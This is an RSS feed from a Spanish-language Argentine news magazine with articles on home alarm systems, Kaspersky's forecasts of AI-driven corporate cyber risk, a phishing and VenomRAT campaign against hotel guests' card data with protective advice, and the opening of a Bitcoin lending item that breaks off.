<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Riesgo &#8211; Todo en un click</title>
	<atom:link href="https://www.todoenunclick.com/tag/riesgo/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.todoenunclick.com</link>
	<description>Magazine Digital de Noticias</description>
	<lastBuildDate>Mon, 20 Apr 2026 14:53:47 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
<site xmlns="com-wordpress:feed-additions:1">74029197</site>	<item>
		<title>¿Cámaras o seguridad? Por qué tu sistema podría fallar</title>
		<link>https://www.todoenunclick.com/camaras-o-seguridad-por-que-tu-sistema-podria-fallar/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 20 Apr 2026 14:53:42 +0000</pubDate>
				<category><![CDATA[Hogar]]></category>
		<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[alarma]]></category>
		<category><![CDATA[cámaras]]></category>
		<category><![CDATA[monitoreo]]></category>
		<category><![CDATA[prevención]]></category>
		<category><![CDATA[protección]]></category>
		<category><![CDATA[Riesgo]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[sistema]]></category>
		<category><![CDATA[tecnología]]></category>
		<category><![CDATA[verificación]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101885</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="¿Cámaras o seguridad? Por qué tu sistema podría fallar" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="(max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>En la Argentina actual, la delincuencia ha evolucionado hacia modalidades más rápidas y oportunistas. Ante este escenario, la <strong>seguridad</strong> ha dejado de ser un complemento para convertirse en una prioridad absoluta. Sin embargo, existe una paradoja: nunca hubo tantos dispositivos instalados y, a la vez, tanta sensación de vulnerabilidad.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El error más común es creer que el equipamiento por sí solo garantiza resultados. Como advierten desde la Cámara Argentina de Seguridad Electrónica (CASEL), el problema no es la falta de tecnología, sino la ausencia de un criterio sistémico para utilizarla.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">La seguridad como un sistema de capas</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Para que la protección sea efectiva en un entorno complejo, debe entenderse como un conjunto de engranajes que trabajan en equipo. No es un producto que se compra en una caja, es un proceso.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La estrategia ideal se divide en tres etapas fundamentales:</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true} -->
<ol class="wp-block-list"><!-- wp:list-item -->
<li><strong>Prevención (La primera barrera):</strong> Consiste en evitar que el evento ocurra. Una propiedad con buena iluminación, <strong>cámaras</strong> visibles y cartelería de monitoreo disuade al delincuente, quien generalmente busca el objetivo de menor riesgo.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Detección anticipada:</strong> Es el punto más débil en muchos hogares argentinos. El objetivo es identificar al intruso antes de que logre vulnerar un acceso. Aquí entran en juego los sensores exteriores y la tecnología perimetral.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Acción y respuesta:</strong> Una vez detectado el movimiento, el sistema debe generar una alerta que sea atendida por humanos capacitados.</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:heading -->
<h2 class="wp-block-heading">El riesgo de los kits autoinstalables y el mercado informal</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>El mercado actual está saturado de soluciones económicas y dispositivos que prometen protección inmediata sin necesidad de cables ni técnicos. Si bien la <strong>tecnología</strong> es accesible, su eficacia depende de la configuración.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Muchos usuarios adquieren una <strong>alarma</strong> que solo emite un sonido local o envía una notificación al celular que el dueño, por estar durmiendo o trabajando, no llega a ver. Esto genera una falsa sensación de resguardo. La instalación sin certificación técnica puede derivar en fallas críticas justo en el momento en que más se necesita el equipo.</p>
<!-- /wp:paragraph -->

<!-- wp:quote -->
<blockquote class="wp-block-quote"><!-- wp:paragraph -->
<p><em>"La seguridad no es un gasto, es una decisión que empieza por entender que no se trata de tener más dispositivos, sino de tener un sistema que funcione."</em></p>
<!-- /wp:paragraph --></blockquote>
<!-- /wp:quote -->

<!-- wp:heading -->
<h2 class="wp-block-heading">La verificación: ver para decidir</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Uno de los avances más importantes en la industria es la capacidad de <strong>verificación</strong> en tiempo real. Ante un disparo de sensores, el propietario o la central de control pueden acceder a las imágenes instantáneamente.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Esta capa de inteligencia permite distinguir entre una falsa alarma (causada por una mascota o el clima) y un intento de robo real. La información precisa acelera la toma de decisiones y optimiza el aviso a las fuerzas de seguridad.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">El valor del monitoreo profesional</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Se estima que en Argentina menos del 20% de los sistemas cuentan con <strong>monitoreo</strong> profesional. Esto significa que la gran mayoría de las personas dependen exclusivamente de su propia reacción frente al peligro.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Contar con una central operativa las 24 horas ofrece ventajas que una app por sí sola no puede cubrir:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Validación constante del estado del equipo.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Activación de protocolos ante situaciones de estrés.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Gestión de la respuesta operativa inmediata.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:heading -->
<h2 class="wp-block-heading">Conclusión: una mirada estratégica</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>La eficacia de un esquema de protección en la Argentina de hoy no reside en la marca de la cámara o la potencia de la sirena. La verdadera diferencia radica en lo que sucede antes, durante y después de un intento de intrusión. Invertir en seguridad profesional es, en última instancia, invertir en tranquilidad y en la reducción real de riesgos en un contexto donde la improvisación puede salir muy cara.</p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/camaras-o-seguridad-por-que-tu-sistema-podria-fallar/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101885</post-id>	</item>
		<item>
		<title>La IA redefinirá la ciberseguridad empresarial en 2026</title>
		<link>https://www.todoenunclick.com/la-ia-redefinira-la-ciberseguridad-empresarial-en-2026/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Wed, 17 Dec 2025 12:43:46 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[2026]]></category>
		<category><![CDATA[deepfakes]]></category>
		<category><![CDATA[fraude]]></category>
		<category><![CDATA[IA]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[Riesgo]]></category>
		<category><![CDATA[seguridad empresarial]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101475</guid>

					<description><![CDATA[<p><img width="1500" height="844" src="https://www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?w=1500&amp;ssl=1 1500w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?resize=284%2C160&amp;ssl=1 284w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?resize=597%2C336&amp;ssl=1 597w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?resize=746%2C420&amp;ssl=1 746w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?resize=640%2C360&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?resize=681%2C383&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?w=1280&amp;ssl=1 1280w" sizes="(max-width: 1500px) 100vw, 1500px" /></p><!-- wp:paragraph -->
<p><strong>Kaspersky anticipa que las compañías deberán prepararse para un entorno donde los deepfakes, los modelos abiertos y la automatización de ataques impulsada por IA redefinirán la gestión del riesgo, el fraude y la protección operativa.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los expertos de Kaspersky han dado a conocer sus predicciones sobre el impacto que tendrá la inteligencia artificial en la ciberseguridad empresarial de cara a 2026. El análisis revela que la rápida adopción de modelos de lenguaje, sistemas generativos y agentes autónomos marcará un antes y un después tanto en las capacidades defensivas de las organizaciones como en el nivel de sofisticación de los ciberataques.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En un contexto donde la digitalización, el trabajo híbrido y la automatización ya forman parte del núcleo del negocio, la IA se convertirá en un factor crítico para la resiliencia operativa, la reputación corporativa y la continuidad del negocio.</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":1} -->
<ol start="1" class="wp-block-list"><!-- wp:list-item -->
<li><strong>Los deepfakes pasarán de ser una</strong><strong> amenaza emergente a riesgo estructural para las empresas</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>El hecho de que <strong>el </strong><strong>70</strong><strong>% de los latinoamericanos</strong> aún no sepa qué es un deepfake, según un <a href="https://latam.kaspersky.com/blog/lena-para-la-infodemia-7-de-cada-10-latinoamericanos-desconoce-que-es-un-deepfake-contribuyendo-a-la-sobrecarga-mental/23773/">estudio</a> de Kaspersky, representa una vulnerabilidad crítica para las empresas de la región. <strong>Así lo admite el 67% de los argentinos, 75% de peruanos, 72% de mexicanos y chilenos y el 66% de brasileros.</strong> Esta falta de conocimiento expone a colaboradores, proveedores y clientes a fraudes cada vez más creíbles, impulsados por inteligencia artificial, en un entorno donde la suplantación de identidad, la manipulación de voz e imagen y la ingeniería social avanzada evolucionan con mayor rapidez que la capacidad de detección humana.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En 2026, los deepfakes estarán plenamente integrados en el panorama de riesgos corporativos, por lo que las empresas deberán tratarlos como amenazas permanentes y no como incidentes aislados. La suplantación de ejecutivos, los fraudes financieros, la manipulación de comunicaciones internas y los ataques dirigidos a áreas críticas como finanzas, compras y dirección general convertirán el desconocimiento en un riesgo directo para la continuidad del negocio, la reputación corporativa y la estabilidad financiera.</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":2} -->
<ol start="2" class="wp-block-list"><!-- wp:list-item -->
<li><strong>Mayor calidad y accesibilidad del fraude basado en IA</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>La mejora drástica del audio sintético permitirá ataques de voz altamente realistas, mientras que las herramientas de generación serán cada vez más fáciles de usar. Esto incrementará los casos de fraude por suplantación, estafas en transferencias, manipulación de proveedores y ataques al área financiera.</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":3} -->
<ol start="3" class="wp-block-list"><!-- wp:list-item -->
<li><strong>Falta de estándares sólidos para identificar contenido generado por IA</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>La ausencia de sistemas universales realmente fiables para etiquetar e identificar contenido generado por inteligencia artificial obligará a las empresas a reforzar sus propios mecanismos de validación, verificación y control de autenticidad, especialmente en procesos críticos como autorizaciones de pago, comunicaciones internas y gestión de proveedores. Esto implicará ajustes en los flujos operativos y una mayor inversión en tecnología y capacitación.</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":4} -->
<ol start="4" class="wp-block-list"><!-- wp:list-item -->
<li><strong>La IA como motor transversal en toda la cadena del ciberataque</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>La IA será clave para que los actores maliciosos automaticen tareas que antes requerían altos niveles de experiencia. Desde la planificación y el desarrollo de herramientas hasta la preparación de infraestructuras y la generación de comunicaciones fraudulentas, la inteligencia artificial reducirá drásticamente los tiempos y elevará la profesionalización de cada fase del ataque.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Como resultado, las operaciones serán más rápidas, más escalables y mucho más difíciles de rastrear, aumentando la capacidad de los atacantes para adaptarse, evadir defensas y lanzar campañas altamente personalizadas contra organizaciones específicas.</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":5} -->
<ol start="5" class="wp-block-list"><!-- wp:list-item -->
<li><strong>Regulación, secure by design y control corporativo del uso de la IA</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Si bien la reglamentación y las políticas públicas jugarán un rol clave en la adopción responsable de la inteligencia artificial, como lo reflejan los debates legislativos en Colombia y Brasil, la gestión efectiva de los riesgos asociados a la IA no puede depender exclusivamente del marco regulatorio. Las organizaciones deben anticiparse e integrar principios de security and privacy by design desde las etapas iniciales de diseño, desarrollo y despliegue de sistemas de IA, a lo largo de todo su ciclo de vida, con el fin de prevenir riesgos como la fuga de datos, manipulaciones, sesgos y usos indebidos de información sensible.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En este contexto, la decisión de permitir, limitar o restringir el uso de inteligencia artificial dentro de la organización deberá integrarse a la matriz de riesgos corporativa y formalizarse mediante políticas internas claras de gobernanza de IA. Procesos, datos y activos críticos o confidenciales no deben ser automatizados ni procesados mediante IA sin previas evaluaciones de impacto, controles técnicos robustos, auditorías periódicas y mecanismos de supervisión humana, a fin de garantizar un uso alineado con los principios regulatorios emergentes y asegurar que la empresa mantenga el control total sobre su información, sus decisiones y sus operaciones críticas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Lo más disruptivo de 2026 no será únicamente la capacidad técnica de los deepfakes o de la IA, sino el impacto directo que tendrán en la toma de decisiones empresariales. Las compañías deberán operar en un entorno en el que ya no será posible asumir que la información es auténtica por defecto, lo que obliga a repensar controles, políticas internas y modelos de seguridad desde el diseño. Esta pérdida de certeza transformará la forma en que se aprueban operaciones, se gestionan riesgos y se protege la confianza dentro de la organización. La verdadera ventaja competitiva ya no estará solo en detectar amenazas, sino en construir modelos de negocio resilientes, donde el uso de la IA esté alineado a la matriz de riesgo y la veracidad de la información deba ser verificada de manera sistemática”, </em><strong>asegura Claudio Martinelli, director general de las Américas en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para evitar este tipo de vulnerabilidades, los expertos de Kaspersky recomiendan:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Control web para reducir riesgos desde la navegación:</strong> Las empresas deben contar con web control para regular a qué sitios y recursos pueden acceder los empleados. Esto permite bloquear páginas maliciosas, plataformas de fraude o herramientas de generación de contenido peligroso, reduciendo el riesgo de infecciones, estafas y fugas de información desde el origen.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Control de aplicaciones en equipos y celulares corporativos:</strong> Es clave aplicar application control en desktops y mobile device management (MDM) para decidir qué aplicaciones pueden usarse dentro de la empresa. Esto ayuda a bloquear apps legítimas que están siendo usadas para estafas cuando no son necesarias para la operación, evitando suplantaciones, fraudes y comunicaciones no autorizadas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Capacitación continua, el factor humano sigue siendo el mayor riesgo:</strong> Las empresas deben invertir en la educación constante de sus colaboradores, ya que el error humano sigue siendo la principal puerta de entrada de los ataques. Plataformas como <a href="https://latam.kaspersky.com/small-to-medium-business-security/security-awareness-platform">Kaspersky Automated Security Awareness Platform</a> (ASAP) de Kaspersky permiten entrenar a los empleados con cursos y simulaciones prácticas para reducir el riesgo de fraudes, phishing y suplantaciones basadas en IA.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<p><a href="https://www.todoenunclick.com/la-ia-redefinira-la-ciberseguridad-empresarial-en-2026/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101475</post-id>	</item>
		<item>
		<title>Alerta a viajeros: ataques con IA dirigidos a huéspedes de hoteles en Latinoamérica y España</title>
		<link>https://www.todoenunclick.com/alerta-a-viajeros-ataques-con-ia-dirigidos-a-huespedes-de-hoteles-en-latinoamerica-y-espana/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Thu, 18 Sep 2025 14:10:40 +0000</pubDate>
				<category><![CDATA[Lifestyle]]></category>
		<category><![CDATA[ataques IA]]></category>
		<category><![CDATA[hoteles]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[RevengeHotels]]></category>
		<category><![CDATA[Riesgo]]></category>
		<category><![CDATA[tarjetas crédito]]></category>
		<category><![CDATA[viajeros]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101103</guid>

					<description><![CDATA[<p><img width="2560" height="1707" src="https://www.todoenunclick.com/wp-content/uploads/2025/09/revenge-hotels-scaled.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/revenge-hotels-scaled.jpg?w=2560&amp;ssl=1 2560w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/revenge-hotels-scaled.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/revenge-hotels-scaled.jpg?resize=504%2C336&amp;ssl=1 504w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/revenge-hotels-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/revenge-hotels-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/revenge-hotels-scaled.jpg?resize=2048%2C1365&amp;ssl=1 2048w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/revenge-hotels-scaled.jpg?resize=630%2C420&amp;ssl=1 630w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/revenge-hotels-scaled.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/revenge-hotels-scaled.jpg?resize=681%2C454&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/revenge-hotels-scaled.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/revenge-hotels-scaled.jpg?w=1920&amp;ssl=1 1920w" sizes="(max-width: 2560px) 100vw, 2560px" /></p><!-- wp:paragraph -->
<p>Si te has alojado recientemente en un hotel de Latinoamérica y España, es posible que los datos de tu tarjeta de crédito estén en riesgo. Entre junio y agosto de 2025, el Equipo Global de Investigación y Análisis de Kaspersky (GReAT) descubrió una nueva ola de ciberataques realizados por un grupo de amenazas llamado RevengeHotels, que apunta a hoteles para robar informaciones de tarjetas de crédito de los huéspedes. El grupo, activo desde 2015, ha pasado los últimos años sin presentar ninguna novedad, hasta ahora que los expertos de GREAT identificaron una campaña que marca la reaparición del grupo con una mejora de sus métodos, como el uso de Inteligencia Artificial para que los ataques sean más efectivos y así, puedan expandirlos a otras regiones.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Aunque los hoteles brasileños son el principal objetivo de la nueva campaña, la actividad también se ha extendido a países hispanohablantes como Argentina, Bolivia, Chile, Costa Rica, México y España. A comienzos de este año se observó otra campaña del mismo actor dirigida a usuarios en Rusia, Bielorrusia, Turquía, Malasia, Italia y Egipto.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El actor de amenazas utiliza correos de <em>phishing</em> disfrazados de pedidos de reservación, solicitando a los destinatarios que revisen los documentos adjuntos. El enlace incluido en los documentos engaña al usuario para instalar un Troyano de Acceso Remoto (RAT) que permite emitir comandos para controlar los sistemas comprometidos y robar información sensible. Estos mensajes suelen enviarse a direcciones de correo asociadas a reservas de hotel. En algunos casos recientes, se ha observado el uso de falsas solicitudes de empleo, en las que los atacantes envían currículums para intentar explotar posibles ofertas de empleo en los hoteles objetivo. Para realizar la infección, los atacantes se apoyan en servicios de alojamiento legítimos, a menudo registrando dominios con temática portuguesa.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Cuando un empleado abre estos correos, se instala un malware llamado VenomRAT en los sistemas del hotel, dando a los atacantes acceso a los datos de pago de los huéspedes y otra información sensible. VenomRAT se distribuye en recursos de la dark web, con licencias de por vida que pueden alcanzar los 650?dólares. Los correos suelen ser convincentes y, de acuerdo con el análisis de los expertos de Kaspersky, la muestra que muchos de los infectores iniciales recién creados por RevengeHotels incluyen código probablemente generado mediante IA.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“</em><em>Los ciberdelincuentes están usando cada vez más la IA para crear nuevas herramientas y hacer que sus ataques sean más efectivos. Esto hace que incluso los métodos conocidos, como los correos de phishing, sean más difíciles de detectar para usuarios comunes. Para los huéspedes de hoteles, esto significa un mayor riesgo de robo de datos de tarjetas y otra información personal,</em><em> que se venderán en la dark web”</em>, comenta <strong>Lisandro Ubiedo, </strong><strong>analista </strong><strong>senior </strong><strong>de seguridad </strong><strong>en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para que los huéspedes puedan protegerse, los expertos&nbsp; de Kaspersky recomiendan:&nbsp;&nbsp;</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Antes de hacer una reservación, verifica si el hotel cumple con los principales estándares de seguridad, como ISO o PCI DSS.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Utiliza una solución de seguridad confiable en todos tus dispositivos, como <a href="https://www.kaspersky.ru/premium">Kaspersky Premium</a>, que protege datos personales y de pago durante las transacciones bancarias en línea.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Haz una búsqueda rápida en internet de reseñas o noticias recientes del  hotel donde te hospedarás. Esto puede ayudarte a conocer la forma en que el establecimiento maneja la seguridad de los datos.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Considera usar una dirección de correo electrónico y un número de teléfono secundarios solo para sus viajes, para mantener privados tus contactos principales.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Opta por usar una tarjeta de crédito con un límite de menor o usa tarjetas virtuales cuando sea posible; son más fáciles de pausar o cancelar si es necesario.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Para los hoteles, los expertos de Kaspersky recomiendan:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Verificar que la infraestructura del hotel cumpla con estándares internacionales de seguridad digital y privacidad de datos.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Implementar sistemas de pago con autenticación avanzada como 3D Secure, tokenización o pasarelas seguras para reducir fraudes en transacciones online.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Monitorear reseñas, foros y noticias relacionadas con el hotel o la cadena para anticipar riesgos de desinformación o ataques reputacionales.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Utilizar cuentas de correo y líneas telefónicas distintas para operaciones internas, reservas corporativas y uso personal de colaboradores con el fin de limitar la exposición.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Evitar el uso de software obsoleto en procesos críticos ya que sistemas desactualizados representan puertas de entrada fáciles para ataques de ransomware o robo de datos.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Instruir al personal para que pregunte y reporte actividades sospechosas como correos extraños, solicitudes inusuales de datos de clientes o comportamientos anómalos en sistemas.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/alerta-a-viajeros-ataques-con-ia-dirigidos-a-huespedes-de-hoteles-en-latinoamerica-y-espana/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101103</post-id>	</item>
		<item>
		<title>Nueva era Ledn: custodia total en préstamos Bitcoin</title>
		<link>https://www.todoenunclick.com/ledn-adopta-un-modelo-de-prestamos-exclusivo-en-bitcoin-con-custodia-total-eliminando-el-riesgo-para-sus-clientes/</link>
		
		<dc:creator><![CDATA[Lucia Busquiazo]]></dc:creator>
		<pubDate>Tue, 27 May 2025 19:21:25 +0000</pubDate>
				<category><![CDATA[Criptoeconomía]]></category>
		<category><![CDATA[activos]]></category>
		<category><![CDATA[Bitcoin]]></category>
		<category><![CDATA[criptomonedas]]></category>
		<category><![CDATA[custodia]]></category>
		<category><![CDATA[digitales]]></category>
		<category><![CDATA[Finanzas]]></category>
		<category><![CDATA[ledn]]></category>
		<category><![CDATA[préstamos]]></category>
		<category><![CDATA[Riesgo]]></category>
		<category><![CDATA[seguridad]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=100573</guid>

					<description><![CDATA[<p><img width="950" height="544" src="https://www.todoenunclick.com/wp-content/uploads/2017/10/bitcoins.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Esperando el Bitcoin Gold, dividiendo lo dividido" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2017/10/bitcoins.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2017/10/bitcoins.jpg?resize=733%2C420&amp;ssl=1 733w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2017/10/bitcoins.jpg?resize=640%2C366&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2017/10/bitcoins.jpg?resize=681%2C390&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2017/10/bitcoins.jpg?resize=279%2C160&amp;ssl=1 279w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2017/10/bitcoins.jpg?resize=768%2C440&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2017/10/bitcoins.jpg?resize=587%2C336&amp;ssl=1 587w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p><strong>Ledn suspende la generación de rendimiento de bitcoin y la compatibilidad con ETH, para apostar por los préstamos con garantía total de Bitcoin.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":100575,"width":"575px","height":"auto","sizeSlug":"large","linkDestination":"none"} -->
<figure class="wp-block-image size-large is-resized"><img src="https://www.todoenunclick.com/wp-content/uploads/2025/05/Foto-Mauricio-LEDN-1-horizontal-1-420x336.jpg" alt="" class="wp-image-100575" style="width:575px;height:auto" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
